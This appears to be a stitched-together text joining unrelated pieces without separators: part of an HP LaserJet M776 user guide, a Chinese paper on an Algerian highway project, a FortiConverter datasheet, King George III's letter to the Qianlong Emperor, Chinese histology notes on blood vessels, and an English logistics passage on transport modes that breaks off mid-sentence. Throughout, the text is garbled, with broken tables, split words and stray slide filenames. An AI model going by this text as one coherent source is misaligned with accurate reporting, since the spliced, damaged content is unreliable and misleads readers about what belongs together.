(30)550-sheet paper tray paper orientation (32)Use alternative letterhead mode (35)Enable Alternative Letterhead Mode by using the printer control-panel menus (35)ivLoad paper to the 2 x 550-sheet paper trays (36)Load paper to the 2 x 550-sheet paper trays (36)2 x 550-sheet paper tray paper orientation (38)Use alternative letterhead mode (41)Enable Alternative Letterhead Mode by using the printer control-panel menus (41)Load paper to the 2,700-sheet high-capacity input paper trays (41)Load paper to the 2,700-sheet high-capacity input paper trays (41)2,700-sheet HCI paper tray paper orientation (43)Use alternative letterhead mode (45)Enable Alternative Letterhead Mode by using the printer control-panel menus (45)Load and print envelopes (46)Print envelopes (46)Envelope orientation (46)Load and print labels (47)Manually feed labels (47)Label orientation (48)3 Supplies, accessories, and parts (49)Order supplies, accessories, and parts (49)Ordering (49)Supplies and accessories (50)Maintenance/long-life consumables (51)Customer self-repair parts (51)Dynamic security (52)Configure the HP toner-cartridge-protection supply settings (53)Introduction (53)Enable or disable the Cartridge Policy feature (53)Use the printer control panel to enable the Cartridge Policy feature (54)Use the printer control panel to disable the Cartridge Policy feature (54)Use the HP Embedded Web Server (EWS) to enable the Cartridge Policy feature (54)Use the HP Embedded Web Server (EWS) to disable the Cartridge Policy feature (55)Troubleshoot Cartridge Policy control panel error messages (55)Enable or disable the Cartridge Protection feature (55)Use the printer control panel to enable the Cartridge Protection feature (56)Use the printer control panel to disable the Cartridge Protection feature (56)Use the HP Embedded Web Server (EWS) to enable the Cartridge Protection feature (56)Use the HP Embedded Web Server (EWS) to disable the Cartridge Protection feature (57)Troubleshoot Cartridge Protection control panel error messages (57)Replace the toner cartridges (58)T oner-cartridge information (58)Remove and replace the cartridges (59)Replace the imaging drums (62)Imaging drum information (62)Remove and replace the imaging drums (63)Replace the toner-collection unit (66)T oner-collection unit information (66)vRemove and replace the toner-collection unit (67)Replace the staple cartridge (M776zs model only) (70)Staple cartridge information (70)Remove and replace the staple cartridge (71)4 Print (73)Print tasks (Windows) (73)How to print (Windows) (73)Automatically print on both sides (Windows) (74)Manually print on both sides (Windows) (74)Print multiple pages per sheet (Windows) (75)Select the paper type (Windows) (75)Additional print tasks (76)Print tasks (macOS) (77)How to print (macOS) (77)Automatically print on both sides (macOS) (77)Manually print on both sides (macOS) (77)Print multiple pages per sheet (macOS) (78)Select the paper type (macOS) (78)Additional print tasks (79)Store print jobs on the printer to print later or print privately (79)Introduction (79)Create a stored job (Windows) (79)Create a stored job (macOS) (80)Print a stored job (81)Delete a stored job (81)Delete a job that is stored on the printer (81)Change the job storage limit (82)Information sent to printer for Job Accounting purposes (82)Mobile printing (82)Introduction (82)Wi-Fi, Wi-Fi Direct Print, NFC, and BLE printing (82)Enable wireless printing (83)Change the Wi-Fi Direct name (83)HP ePrint via email (83)AirPrint (84)Android embedded printing (85)Print from a USB flash drive (85)Enable the USB port for printing (85)Method one: Enable the USB port from the printer control panel (85)Method two: Enable the USB port from the HP Embedded Web Server (network-connectedprinters only) (85)Print USB documents (86)Print using high-speed USB 2.0 port (wired) (86)Method one: Enable the high-speed USB 2.0 port from the printer control panel menus (86)Method two: Enable the high-speed USB 2.0 port from the HP Embedded Web Server (network-connected printers only) (87)vi5 Copy (88)Make a copy (88)Copy on both sides (duplex) (90)Additional copy tasks (92)6 Scan (93)Set up Scan to Email (93)Introduction (93)Before you begin (93)Step one: Access the HP Embedded Web Server (EWS) (94)Step two: Configure the Network Identification settings (95)Step three: Configure the Send to Email feature (96)Method one: Basic configuration using the Email Setup Wizard (96)Method two: Advanced configuration using the Email Setup (100)Step four: Configure the Quick Sets (optional) (104)Step five: Set up Send to Email to use Office 365 Outlook (optional) (105)Introduction (105)Configure the outgoing email server (SMTP) to send an email from an Office 365 Outlookaccount (105)Set up Scan to Network Folder (108)Introduction (108)Before you begin (108)Step one: Access the HP Embedded Web Server (EWS) (108)Step two: Set up Scan to Network Folder (109)Method one: Use the Scan to Network Folder Wizard (109)Method two: Use Scan to Network Folder Setup (110)Step one: Begin the configuration (110)Step two: Configure the Scan to Network Folder settings (111)Step three: Complete the configuration (118)Set up Scan to SharePoint (118)Introduction (118)Before you begin (118)Step one: Access the HP Embedded Web Server (EWS) (118)Step two: Enable Scan to SharePoint and create a Scan to SharePoint Quick Set (119)Scan a file directly to a SharePoint site (121)Quick Set scan settings and options for Scan to SharePoint (122)Set up Scan to USB Drive (123)Introduction (124)Step one: Access the HP Embedded Web Server (EWS) (124)Step two: Enable Scan to USB Drive (124)Step three: Configure the Quick Sets (optional) (125)Default scan settings for Scan to USB Drive setup (126)Default file settings for Save to USB setup (126)Scan to email (127)Introduction (127)Scan to email (127)Scan to job storage (129)viiIntroduction (129)Scan to job storage on the printer (130)Print from job storage on the printer (132)Scan to network folder (132)Introduction (132)Scan to network folder (132)Scan to SharePoint (134)Introduction (134)Scan to SharePoint (134)Scan to USB drive (136)Introduction (136)Scan to USB drive (136)Use HP JetAdvantage business solutions (138)Additional scan tasks (138)7 Fax (140)Set up fax (140)Introduction (140)Set up fax by using the printer control panel (140)Change fax configurations (141)Fax dialing settings (141)General fax send settings (142)Fax receive settings (143)Send a fax (144)Additional fax tasks (146)8 Manage the printer (147)Advanced configuration with the HP Embedded Web Server (EWS) (147)Introduction (147)How to access the HP Embedded Web Server (EWS) (148)HP Embedded Web Server features (149)Information tab (149)General tab (149)Copy/Print tab (150)Scan/Digital Send tab (151)Fax tab (152)Supplies tab (153)Troubleshooting tab (153)Security tab (153)HP Web Services tab (154)Networking tab (154)Other Links list (156)Configure IP network settings (157)Printer sharing disclaimer (157)View or change network settings (157)Rename the printer on a network (157)viiiManually configure IPv4 TCP/IP parameters from the control panel (158)Manually configure IPv6 TCP/IP parameters from the control panel (158)Link speed and duplex settings (159)Printer security features (160)Introduction (160)Security statements (160)Assign an administrator password (160)Use the HP Embedded Web Server (EWS) to set the password (160)Provide user access credentials at the printer control panel (161)IP Security (161)Encryption support: HP High Performance Secure Hard Disks (161)Lock the formatter (161)Energy-conservation settings (161)Set the sleep timer and configure the printer to use 1 watt or less of power (161)Set the sleep schedule (162)Set the idle settings (162)HP Web Jetadmin (163)Software and firmware updates (163)9 Solve problems (164)Customer support (164)Control panel help system (165)Reset factory settings (165)Introduction (165)Method one: Reset factory settings from the printer control panel (165)Method two: Reset factory settings from the HP Embedded Web Server (network-connectedprinters only) (166)A “Cartridge is low” or “Cartridge is very low” message displays on the printer control panel (166)Change the “Very Low” settings (166)Change the “Very Low” settings at the control panel (166)For printers with fax capability (167)Order supplies (167)Printer does not pick up paper or misfeeds (167)Introduction (167)The printer does not pick up paper (167)The printer picks up multiple sheets of paper (171)The document feeder jams, skews, or picks up multiple sheets of paper (174)Clear paper jams (174)Introduction (174)Paper jam locations (174)Auto-navigation for clearing paper jams (175)Experiencing frequent or recurring paper jams? (175)Clear paper jams in the document feeder - 31.13.yz (176)Clear paper jams in Tray 1 (13.A1) (177)Clear paper jams in Tray 2 (13.A2) (182)Clear paper jams in the fuser (13.B9, 13.B2, 13.FF) (188)ixClear paper jams in the duplex area (13.D3) (194)Clear paper jams in the 550-sheet trays (13.A3, 13.A4) (199)Clear paper jams in the 2 x 550 paper trays (13.A4, 13.A5) (206)Clear paper jams in the 2,700-sheet high-capacity input paper trays (13.A3, 13.A4, 13.A5, 13.A7) (213)Resolving color print quality problems (220)Introduction (220)Troubleshoot print quality (221)Update the printer firmware (221)Print from a different software program (221)Check the paper-type setting for the print job (221)Check the paper type setting on the printer (221)Check the paper type setting (Windows) (221)Check the paper type setting (macOS) (222)Check toner-cartridge status (222)Step one: Print the Supplies Status Page (222)Step two: Check supplies status (222)Print a cleaning page (222)Visually inspect the toner cartridge or cartridges (223)Check paper and the printing environment (223)Step one: Use paper that meets HP specifications (223)Step two: Check the environment (223)Step three: Set the individual tray alignment (224)Try a different print driver (224)Troubleshoot color quality (225)Calibrate the printer to align the colors (225)Troubleshoot image defects (225)Improve copy image quality (233)Check the scanner glass for dirt and smudges (233)Calibrate the scanner (234)Check the paper settings (235)Check the paper selection options (235)Check the image-adjustment settings (235)Optimize copy quality for text or pictures (236)Edge-to-edge copying (236)Improve scan image quality (236)Check the scanner glass for dirt and smudges (237)Check the resolution settings (238)Check the color settings (238)Check the image-adjustment settings (239)Optimize scan quality for text or pictures (239)Check the output-quality settings (240)Improve fax image quality (240)Check the scanner glass for dirt and smudges (240)Check the send-fax resolution settings (242)Check the image-adjustment settings (242)Optimize fax quality for text or pictures (242)Check the error-correction setting (243)xSend to a different fax machine (243)Check the sender's fax machine (243)Solve wired network problems (244)Introduction (244)Poor physical connection (244)The computer is unable to communicate with the printer (244)The printer is using incorrect link and duplex settings for the network (245)New software programs might be causing compatibility problems (245)The computer or workstation might be set up incorrectly (245)The printer is disabled, or other network settings are incorrect (245)Solve wireless network problems (245)Introduction (245)Wireless connectivity checklist (245)The printer does not print after the wireless configuration completes (246)The printer does not print, and the computer has a third-party firewall installed (246)The wireless connection does not work after moving the wireless router or printer (247)Cannot connect more computers to the wireless printer (247)The wireless printer loses communication when connected to a VPN (247)The network does not appear in the wireless networks list (247)The wireless network is not functioning (247)Reduce interference on a wireless network (248)Solve fax problems (248)Checklist for solving fax problems (248)What type of phone line are you using? (249)Are you using a surge-protection device? (249)Are you using a phone company voice-messaging service or an answering machine? (249)Does your phone line have a call-waiting feature? (249)Check fax accessory status (249)General fax problems (250)The fax failed to send (250)No fax address book button displays (250)Not able to locate the Fax settings in HP Web Jetadmin (250)The header is appended to the top of the page when the overlay option is enabled (251)A mix of names and numbers is in the recipients box (251)A one-page fax prints as two pages (251)A document stops in the document feeder in the middle of faxing (251)The volume for sounds coming from the fax accessory is too high or too low (251)Index (252)xiPrinter overview1Review the location of features on the printer, the physical and technical specifications of the printer,and where to locate setup information.For video assistance, see /videos/LaserJet.The following information is correct at the time of publication. For current information, see /support/colorljM776MFP.For more information:HP's all-inclusive help for the printer includes the following information:●Install and configure●Learn and use●Solve problems●Download software and firmware updates●Join support forums●Find warranty and regulatory informationWarning iconsUse caution if you see a warning icon on your HP printer, as indicated in the icon definitions.●Caution: Electric shock●Caution: Hot surface●Caution: Keep body parts away from moving partsPrinter overview1●Caution: Sharp edge in close proximity●WarningPotential shock hazardReview this important safety information.●Read and understand these safety statements to avoid an electrical shock hazard.●Always follow basic safety precautions when using this product to reduce risk of injury from fire orelectric shock.●Read and understand all instructions in the user guide.●Observe all warnings and instructions marked on the product.●Use only a grounded electrical outlet when connecting the product to a power source. If you do notknow whether the outlet is grounded, check with a qualified electrician.●Do not touch the contacts on any of the sockets on the product. Replace damaged cordsimmediately.●Unplug this product from wall outlets before cleaning.●Do not install or use this product near water or when you are wet.●Install the product securely on a stable surface.●Install the product in a protected location where no one can step on or trip over the power cord.Printer viewsIdentify certain parts of the printer and the control panel.Printer front viewLocate features on the front of the printer.2Chapter 1 Printer overviewPrinter front view3Printer back viewLocate features on the back of the printer.Interface portsLocate the interface ports on the printer formatter. 4Chapter 1 Printer overviewControl-panel viewThe control panel provides access to the printer features and indicates the current status of the printer.NOTE:Tilt the control panel for easier viewing.The Home screen provides access to the printer features and indicates the current status of the printer.screens.NOTE:The features that appear on the Home screen can vary, depending on the printerconfiguration.Control-panel view5Figure 1-1Control-panel view?i 12:42 PM6Chapter 1 Printer overviewHow to use the touchscreen control panelPerform the following actions to use the printer touchscreen control panel.T ouchT ouch an item on the screen to select that item or open that menu. Also, when scrolling T ouch the Settings icon to open the Settings app.How to use the touchscreen control panel 7SwipeT ouch the screen and then move your finger horizontally to scroll the screen sideways.Swipe until the Settings app displays.Printer specificationsDetermine the specifications for your printer model.IMPORTANT:The following specifications are correct at the time of publication, but they are subject to change. For current information, see /support/colorljM776MFP .T echnical specificationsReview the printer technical specifications.Product numbers for each model ●M776dn - #T3U55A ●Flow M776z - #3WT91A ●Flow M776zs - #T3U56APaper handling specificationsPaper handling features Tray 1 (100-sheet capacity)Included Included Included Tray 2 (550-sheet capacity)IncludedIncludedIncluded8Chapter 1 Printer overview550-sheet paper trayOptional Included Not included NOTE:The M776dn models accept one optional550-sheet tray.Optional Included Included2 x 550-sheet paper tray and standNOTE:The M776dn models accept one optional550-sheet tray that may be installed on top of thestand.Optional Not included Not included2,700-sheet high-capacity input (HCI) paper trayand standNOTE:The M776dn models accept one optional550-sheet tray that may be installed on top of theoptional printer stand.Printer standOptional Not included Not included NOTE:The M776dn models accept one optional550-sheet tray that may be installed on top of theoptional printer stand.Inner finisher accessory Not included Not included Included Automatic duplex printing Included IncludedIncludedIncluded Included Included10/100/1000 Ethernet LAN connection with IPv4and IPv6Hi-Speed USB 2.0Included Included IncludedIncluded Included IncludedEasy-access USB port for printing from a USBflash drive or upgrading the firmwareIncluded Included Included Hardware Integration Pocket for connectingaccessory and third-party devicesHP Internal USB Ports Optional Optional OptionalOptional Optional OptionalHP Jetdirect 2900nw Print Server accessory forWi-Fi connectivity and an additional Ethernet portOptional IncludedIncludedHP Jetdirect 3100w accessory for Wi-Fi, BLE, NFC,and proximity badge readingPrints 45 pages per minute (ppm) on Letter-sizepaper and 46 ppm on A4-size paperEasy-access USB printing for printing from a USBIncluded Included Includedflash driveT echnical specifications9Included Included Included Store jobs in the printer memory to print later orprint privatelyScans 100 pages per minute (ppm) on A4 andIncluded Included Included letter-size paper one-sidedIncluded Included Included 200-page document feeder with dual-headscanning for single-pass duplex copying andscanningNot included Included Included HP EveryPage T echnologies including ultrasonicmulti-feed detectionNot included Included Included Embedded optical character recognition (OCR)provides the ability to convert printed pages intotext that can be edited or searched using acomputerIncluded Included Included SMART Label feature provides paper-edgedetection for automatic page croppingIncluded Included Included Automatic page orientation for pages that haveat least 100 characters of textIncluded Automatic tone adjustment sets contrast,Included Includedbrightness, and background removal for eachpageIncluded Included Includedfolders on a networkIncludedSend documents to SharePoint®Included IncludedIncluded Included Included NOTE:Memory reported on the configurationpage will change from 2.5 GB to 3 GB with theoptional 1 GB SODIMM installed.Mass storage: 500 GB hard disk drive Included Included IncludedSecurity: HP Trusted Platform Module (TPM)Included Included IncludedT ouchscreen control panel Included Included IncludedRetractable keyboard Not included Included Included 10Chapter 1 Printer overviewFax Optional Included IncludedSupported operating systemsUse the following information to ensure printer compatibility with your computer operating system.Linux: For information and print drivers for Linux, go to /go/linuxprinting.UNIX: For information and print drivers for UNIX®, go to /go/unixmodelscripts.The following information applies to the printer-specific Windows HP PCL 6 print drivers, HP print driversfor macOS, and to the software installer.Windows: Download HP Easy Start from /LaserJet to install the HP print driver. Or, go tothe printer-support website for this printer: /support/colorljM776MFP to download the printdriver or the software installer to install the HP print driver.macOS: Mac computers are supported with this printer. Download HP Easy Start either from /LaserJet or from the Printer Support page, and then use HP Easy Start to install the HP print driver.1.Go to /LaserJet.2.Follow the steps provided to download the printer software.Windows 7, 32-bit and 64-bit The “HP PCL 6” printer-specific print driver is installed for this operating system aspart of the software installation.Windows 8.1, 32-bit and 64-bit The “HP PCL-6” V4 printer-specific print driver is installed for this operating systemas part of the software installation.Windows 10, 32-bit and 64-bit The “HP PCL-6” V4 printer-specific print driver is installed for this operating systemas part of the software installation.Windows Server 2008 R2, SP 1, 64-bit The PCL 6 printer-specific print driver is available for download from the printer-support website. Download the driver, and then use the Microsoft Add Printer tool toinstall it.Windows Server 2012, 64-bit The PCL 6 printer-specific print driver is available for download from the printer-support website. Download the driver, and then use the Microsoft Add Printer tool toinstall it.Windows Server 2012 R2, 64-bit The PCL 6 printer-specific print driver is available for download from the printer-support website. Download the driver, and then use the Microsoft Add Printer tool toinstall it.Windows Server 2016, 64-bit The PCL 6 printer-specific print driver is available for download from the printer-support website. Download the driver, and then use the Microsoft Add Printer tool toinstall it.Windows Server 2019, 64-bit The PCL 6 printer-specific print driver is available for download from the printer-support website. Download the driver, and then use the Microsoft Add Printer tool toinstall it.Supported operating systems11macOS 10.13 High Sierra, macOS 10.14 MojaveDownload HP Easy Start from /LaserJet , and then use it to install the print driver.NOTE:Supported operating systems can change.NOTE:For a current list of supported operating systems and HP’s all-inclusive help for the printer, go to /support/colorljM776MFP .NOTE:For details on client and server operating systems and for HP UPD driver support for this printer, go to /go/upd . Under Additional information , click Specifications .●Internet connection●Dedicated USB 1.1 or 2.0 connection or a network connection● 2 GB of available hard-disk space ●1 GB RAM (32-bit) or2 GB RAM (64-bit)●Internet connection●Dedicated USB 1.1 or 2.0 connection or a network connection●1.5 GB of available hard-disk spaceNOTE:The Windows software installer installs the HP Smart Device Agent Base service. The file size is less than 100 kb. Its only function is to check for printers connected via USB hourly. No data is collected. If a USB printer is found, it then tries to locate a JetAdvantage Management Connector (JAMc) instance on the network. If a JAMc is found, the HP Smart Device Agent Base is securelyupgraded to a full Smart Device Agent from JAMc, which will then allow printed pages to be accounted for in a Managed Print Services (MPS) account. The driver-only web packs downloaded from for the printer and installed through the Add Printer wizard do not install this service.T o uninstall the service, open the Control Panel , select Programs or Programs and Features , and then select Add/Remove Programs or Uninstall a Programto remove the service. The file name isHPSmartDeviceAgentBase.Mobile printing solutionsHP offers multiple mobile printing solutions to enable easy printing to an HP printer from a laptop, tablet, smartphone, or other mobile device.T o see the full list and to determine the best choice, go to /go/MobilePrinting .NOTE:Update the printer firmware to ensure all mobile printing capabilities are supported.●Wi-Fi Direct (wireless models only, with HP Jetdirect 3100w BLE/NFC/Wireless accessory installed)●HP ePrint via email (Requires HP Web Services to be enabled and the printer to be registered with HP Connected)●HP Smart app ●Google Cloud Print12Chapter 1 Printer overview。
非洲公路项目施工过程关键技术分析
0引言随着“一带一路”倡议和“走出去”战略的实施,国内许多企业也开始走向非洲市场,但由于非洲诸多国家情况的不一致,包括地质条件、所用规范以及地方民风的不同,会导致项目实施的难度增加。
尤其是对项目建设所处位置条件的不了解,极易造成项目建设成本的增加和施工质量的难以控制。
因此有必要对一个项目在施工过程中的重难点以及关键性技术进行分析[1]。
本文以阿尔及利亚贝佳亚连接线为例,该项目是连接贝佳亚港口-东西高速公路哈尼夫互通的关键性项目。
项目包括路基、桥梁等构造物。
由于阿尔及利亚本国公路执行的是法国技术标准,因此有必要对公路中的构造物在施工过程中的关键性技术进行论证分析以保证项目的施工质量。
最终项目完工后,工程质量均符合阿国技术要求。
拟为相关类似工程提供参考。
1工程概况1.1工程基本情况贝佳亚港口-东西高速公路哈尼夫互通连接线项目S3-2标段工程内容包括PK75+000~PK100+070路基、桥涵工程及PK50+000~PK100+070路面工程,包含7#(PK88)、8#互通(PK100)和3#(PK85)服务区工程等。
S3-2标段路基起讫里程PK75+000~PK100+070,线路长25.07公里,PK75+000-PK86+295段在Bejaia 省境内,PK86+295-PK100+070段在Bouira 省,这两段以南北向的Oued EL-Mahir 河流分界;整个线路都在农田或橄榄林内。
主要经过Boudjellil 、Beni mansour 、Ath mansour 、Taurirt 、Ahnif 等村镇,沿途跨越Sahel 河东西铁路RN5国道直至与已完工的东西高速公路M2标段Ahnif 互通连接。
S3-2标段的路面起讫里程PK50+000~PK100+070,全长50.07公里,PK50至5#互通路面结构层设计为10cmEME+11cmEME+5cmBBME+3.5cmBBMA ,5#互通至PK100+070路面结构层设计为10cmEME +10cmEME +5cmBBME+3.5cmBBMA 。
FortiConverter迁移工具说明书
Major Features§Allows migration to FortiOS solutions.§Eases the pain of vendor transition.§Translation of complex policy sets.§Removal of historical configuration errors. §Automatic validation of new configurations.Whether in timelines, costs, or manpower, FortiConverter provides substantial advantages.Configuration ValidationFortinet believes that transitioning to next-generation security platforms should be as seamless as possible. For this reason, we have developed the FortiConverter software solution.Configuration changes can introduce errors, which accumulate over time. But because these errors have not caused problems, they are often missed or overlooked in a large, complex configuration deployed across an organization. With FortiConverter, validation of theseconfigurations is a simple process. Manually inspecting for errors can take hundreds of hours of expert analysis, which is cost-prohibitive, even if available. With FortiConverter, the software identifies and then removes incorrect or redundant configuration elements during the conversion process.DATA SHEETFortiConverter ™Multi-vendor Configuration Conversion for FortiOSFortiGuard Security ServicesFortiCare Worldwide 24x7 Support2 Key Features & BenefitsMulti-vendor Support Conversion from Alcatel-Lucent, Cisco, Juniper, Check Point, Palo Alto Networks, and SonicWall. A single tool for converting from all the supported vendors.Automated Conversion Configuration conversion is performed according to conversion rules automatically, with a small amount of fine tuning to complete the process. Human error in the conversion process is minimized.Error Correction With many complex configurations, errors creep in over time. FortiConverter identifies these errors so that the new platform can operate at maximum efficiency at the required level of security. Also avoids copying unneeded objects into the new configuration.Full Support The FortiConverter standard license gives access to all vendors and supports configuration conversion of any size and complexity.FortiGate to FortiGateCan migrate configurations between FortiGate devices to minimize the risk associated with network upgrades. Provides the ability to split VDOMs into individual config files. Facilitates migration when the source platform is not supported in 5.x and the target platform is not supported in 4.x. This feature is available with the trial license.savings of simplified management can be realized.HIGHLIGHTS3TUNING FEATURE MATRIXBASE NETWORK OBJECTSShowEdit Add Delete Cascade Update Policy Locate Policy Tooltip Interface Interface √√√√√√√Zone √√√√√√√AddressSubnet √√√√√√√Range √√√√√√√FQDN √√√√√√√Group√√√√√√√ServiceTCPUDP √√√√√√√ICMP √√√√√√√Other √√√√√√√Group√√√√√√√ScheduleOnce √√√√√√√Recur √√√√√√√Group√√√√√√√NATVIP √√√√√√√IPPool√√√√√√√POLICYShowEdit Add Delete Filter Reorder Edit/Add Show Policy √√√√√√√NAT-POLICYShowPolicy Locate SourceNAT √√DestinationNAT √√StaticNAT √√NATRule√√GLOBAL HEADQUARTERS Fortinet Inc.899 Kifer RoadSunnyvale, CA 94086United StatesTel: +/salesEMEA SALES OFFICE 120 rue Albert Caquot 06560, Sophia Antipolis, FranceTel: +33.4.8987.0510APAC SALES OFFICE 300 Beach Road 20-01The Concourse Singapore 199555Tel: +65.6513.3730LATIN AMERICA SALES OFFICEProl. Paseo de la Reforma 115 Int. 702Col. Lomas de Santa Fe,C.P . 01219Del. Alvaro Obregón México D.F .Tel: 011-52-(55) 5524-8480Copyright© 2015 Fortinet, Inc. All rights reserved. Fortinet®, FortiGate®, FortiCare® and FortiGuard®, and certain other marks are registered trademarks of Fortinet, Inc., and other Fortinet names herein may also be registered and/or common law trademarks of Fortinet. All other product or company names may be trademarks of their respective owners. Performance and other metrics contained herein were attained in internal lab tests under ideal conditions, and actual performance and other results may vary and may be significantly less effective than the metrics stated herein. Network variables, different network environments and other conditions may negatively affect performance results and other metrics stated herein. Nothing herein represents any binding commitment by Fortinet, and Fortinet disclaims all warranties, whether express or implied, except to the extent Fortinet enters a binding written contract, signed by Fortinet’s General Counsel, with a purchaser that expressly warrants that the identified product will perform according to certain expressly-identified performance metrics and, in such event, only the specific performance metrics expressly identified in such binding written contract shall be binding on Fortinet and any such commitment shall be limited by the disclaimers in this paragraph and other limitations in the written contract. For absolute clarity, any such warranty will be limited to performance in the same ideal conditions as in Fortinet’s internal lab tests, and in no event will Fortinet be responsible for events or issues that are outside of its reasonable control. Notwithstanding anything to the contrary, Fortinet disclaims in full any covenants, representations, and guarantees pursuant hereto, whether express or implied. Fortinet reserves the right to change, modify, transfer, or otherwise revise this publication without notice, and the most current version of the publication shall be applicable.FST -PROD-DS-FCCC FC-DAT -R3-201507DATA SHEET: FortiConverter ™Product SKUDescriptionFortiConverter FC-10-CON01-401-01-12 1 Year Multi-vendor Configuration Conversion Tool (requires MS Windows) to create FortiOS configuration files.FortiConverterFC-10-CON01-401-02-121 Year Renewal Multi-vendor Configuration Conversion Tool (requires MS Windows) to create FortiOS configuration files.ORDER INFORMATION。
乔治三世和乾隆书信
英文版出处:H. B. Morse, The Chronicles, Vol. II, pp. 244-247His Most Sacred Majesty George the Third, by the Grace of God King of Great Britain, France and Ireland, Sovereign of the Seas, Defender of the Faith and so forth, To the Supreme Emperor of China Kien-long worthy to live tens of thousands and tens of thousands thousand years, sendeth Greeting.英吉利国王热沃尔日敬奏中国大皇帝万万岁:热沃尔日第三世,蒙天主恩英吉利国大红毛及佛朗西依拜尔呢雅国王、海主,恭惟大皇帝万万岁,应该坐殿万万年。
The natural disposition of a great and benevolent Sovereign, such as is Your Imperial Majesty, whom Providence has seated upon a Throne for the good of Mankind, is, to watch over the peace and security of his dominion, and to take pains for disseminating happiness, virtue and knowledge among his subjects, extending also the same beneficence with all the peaceful arts, as far as he is able, to the whole human race.本国知道中国地方甚大,管的百姓甚多,大皇帝的心里长把天下的事情、各处的人民时时照管,不但中国地方,连外国的地方都要保护他。
中空性器官(cavity.
酸性。
blood vessel -model.ppt
medium-sized artery.ppt
(二)中膜 (tunica media)
capillary-L.ppt
(二)毛细血管在电镜下的分类和结构
在光镜下观察,各种组织和器官中的毛细血管结构相似,
但在电镜下,根据内皮细胞等的结构特点,可以将毛细血管分
为三型:连续毛细血管、有孔毛细血管和血窦。 ⒈ 连续毛细血管(continuous capillary) 内皮细胞之间有 紧密连接,基膜完整;内皮细胞胞质内有许多吞饮小泡,小泡 融合可形成暂时性穿内皮小管(transendothelial channel)。 主要分布于肌组织、肺及中枢神经系统等处。 capillary1.ppt
巴器官等。这类器官的结构可分为三部分:被膜、实质和 间质。 被膜 (capsule) 实质 (parenchyma) 器官表面的结缔组织。 每一个器官特有的组织。
间质 (interstitial tissue)
血管、神经等。
器官内部的结缔组织,含
心血管系统:心脏、动脉、毛细血管和静脉
组成
(cardiovascular system)
颈动脉体是感受动脉血氧、二氧化碳含量和血液 pH值变化的化学感受器,可将这些信息传入中枢, 对心血管系统和呼吸系统进行调节。
主动脉体在结构和功能上与颈动脉体相似。
颈动脉窦是颈总动脉分支处的一个膨大部,该处 管壁中膜薄,平滑肌较少,外膜较厚,外膜中有许 多来源于舌咽神经的感觉神经末梢。 颈动脉窦是压力感受器,能感受因血压上升致血
物流英语
TransportationWhat is transportationEvery firm requires the movement of goods from the point to another point. Transportation refers to the physical movement of goods from a point of origin to a point of consumption. It can involve raw materials being brought into the production process or finished goods being shipped to the customer. Transportation is one of the most significant areas of logistics management. Railway, road, waterway, air, and pipeline transportation make up the major modes of transport in modern society. Each mode has its own requirements and features.The field can be divided into infrastructure, vehicles, and operations. Infrastructure consists of the fixed installations necessary for transport, and may be roads, railways, airways, waterways, canals and pipelines, and terminals such as airports, railway stations, bus stations, wharehouses, trucking terminals, refueling depots (including fueling docks and fuel stations) and seaports. Terminals may both be used for interchange of passengers and cargo, and for maintenance. Vehicles traveling on these networks include vehicles of appropriate types such as automobiles, bicycles, buses, trains, trucks, helocopters and aircraft. A vehicle is any non-living device that is used to move people and goods. Unlike the infrastructure, the vehicle moves along with the cargo and riders. Vehicles that do not operate on land, are usually called crafts. Unless being pulled by a cable or muscle-power, the vehicle must provide its own propulsion; this is most commonly done through a steam engine, combustion engine, electric motor, a jet engine or a rocket, though other means of propulsion also exist. Vehicles also need a system of converting the energy into movement; this is most commonly done through wheels, propellers and pressure.Vehicles are most commonly staffedby a driver. However, some systems, such as people movers and some rapid transits, are fully automated. For passenger transport, the vehicle must have a compartment for the passengers. Simple vehicles, such as automobiles, bicycles or simple aircraft, may have one of the passengers as a driver. Operations deal with the way the vehicles are operated, and the procedures set for this purpose including financing, legalities and policies. In the transport industry, operations and ownership of infrastructure can be either public or private, depending on the country and mode. For public transport and freight transport, operations are done through private enterprise or by governments. The infrastructure and vehicles may be owned and operated by the same company, or they may be operated by different entities. Traditionally, many countries have had a national airline and national railway. Since the 1980s, many of these have been privatized. International shipping remains a highly competitive industry with little regulation,but ports can be public owned.Transportation FacilityThe public sector plays an important role in transport, through the construction, ownership and control of roads, railroads and in most countries also ports. The importance of building up a transport infrastructure that involves considerable cost has made this a widely accepted public task. It should be noted in this context that transport is responsible for a substantial number of jobs in the national economies.The fixed components are usually expensive to build and replace and are long-lived traditionally, there have been few and slow technological changes in these elements. Ports are an exception, in the sense that the ways cargo is handled have changed dramatically over the last two decades, especially with the introduction of containers.The mobile elements involved in the production of transport: trucks,rail-wagons, barges, ships, etc, are relatively short-lived, especially as the wear and tear is considerable. In addition, technical development has historically been fast. This does not only relate to the cargo handling techniques, but also to the equipment itself.The mobile units are generally cheap. Ships may be viewed as an exception, but even the price of a ship is low compared to the price of constructing a port or a railway. Unlike the fixed elements, the mobile components of transport may find alternative employment if demand declines in one market. A ship may be moved from one trade or route to another, while a port cannot be moved.The use of mobile units in the transport sector reduces the possibility of benefit from economies of scale. Roads, rail-tracks and ports set limits to the size of the individual mobile unit, and consequently to the cargo shipped. Capacity could—after a certain point—only be expanded by adding more trucks, ships, etc.It is the features of the fixed and mobile components of transport that have influenced the present institutional arrangements in the industry. The high cost of provision, longevity and scale economies associated with the fixed components created tendencies towards monopoly control, while the ease of entry, flexibility and lack of scale effects tend to stimulate competition in the mobile sector. In principle, the structure of the mobile part of the supply side of the transport industry is characterized by many suppliers working on a basis of free competition. It is perhaps typical that the tendency to deviate from this dictum is found in the liner shipping sector of the industry, which is the least mobile, inter alia, because a regular shipping line depend on heavy investments in the infrastructure.Transportation ModesA mode of transport is a technological solution that used afundamentally different vehicle, infrastructure and operations. The transport of a person or cargo may be by one or more modes, the latter called intermodal transport. Each mode has its advantages and disadvantages, its own requirements and features,and will be chosen for a trip depended on the nature of the purpose, cargo and destination. While there transport in air and on water has their own mode, land transport has several modes.The five transportation modes are rail, road, water, air, and pipeline. The relative importance of each mode can be measured in terms of system mileage, traffic volume, revenue, and the nature of traffic composition. Each mode is discussed with respect to these measures.Railway TransportationThe capacity to efficiently transport large tonnage over long distance is the main reason railroads continue to handle significant inter-city tonnage and revenue. Rail offers cost-effective transport of large quantities of cargos over long distance. It is especially good for cargoes with high volume and low value, such as coal, timber and grain. Railroads operations incur high fixed costs because of expensive equipment, right-of-way, switching yards, and terminals. However, rail experiences relatively low variable operation costs. Over the past years rail usage has declined as road transport has taken over short haul business and water transport has taken bulk commodities freight. Rail transport is one of the most energy efficient modes of land transport. Environmental and safe consideration also favor rail over road transport.However, the major disadvantages of railway are the inherent inflexibility of operation, fixed 